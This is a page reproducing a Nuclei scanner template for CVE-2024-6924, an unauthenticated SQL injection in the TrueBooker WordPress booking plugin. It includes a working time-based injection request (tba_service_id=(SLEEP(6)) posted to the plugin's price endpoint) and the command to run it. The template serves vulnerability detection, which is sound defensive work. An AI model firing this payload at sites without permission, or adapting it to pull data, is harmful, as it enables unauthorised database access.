TrueBooker <= 1.0.2 - SQL Injection
ID: CVE-2024-6924
Severity: high
Author: s4e-io
Tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker
Description
Section titled “Description”The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
YAML Source
Section titled “YAML Source”id: CVE-2024-6924
info: name: TrueBooker <= 1.0.2 - SQL Injection author: s4e-io severity: high description: | The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. reference: - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking/truebooker-102-unauthenticated-sql-injection - https://wpscan.com/vulnerability/39e79801-6ec7-4579-bc6b-fd7e899733a8/ metadata: vendor: themetechmount product: truebooker framework: wordpress publicwww-query: "/wp-content/plugins/truebooker-appointment-booking" tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body, "/wp-content/plugins/truebooker-appointment-booking")' internal: true
- raw: - | @timeout 20s POST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
tba_service_id=(SLEEP(6))
matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' condition: and# digest: 490a0046304402206070535d6adfb43befc46f8f7b72f5d2d3103d219ef04b859032e261abafdfba022024b3a6bb31120fde3cf3d06aa999d7ab205786cf55b7f2e2e88e75172e7a0c6e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-6924.yaml"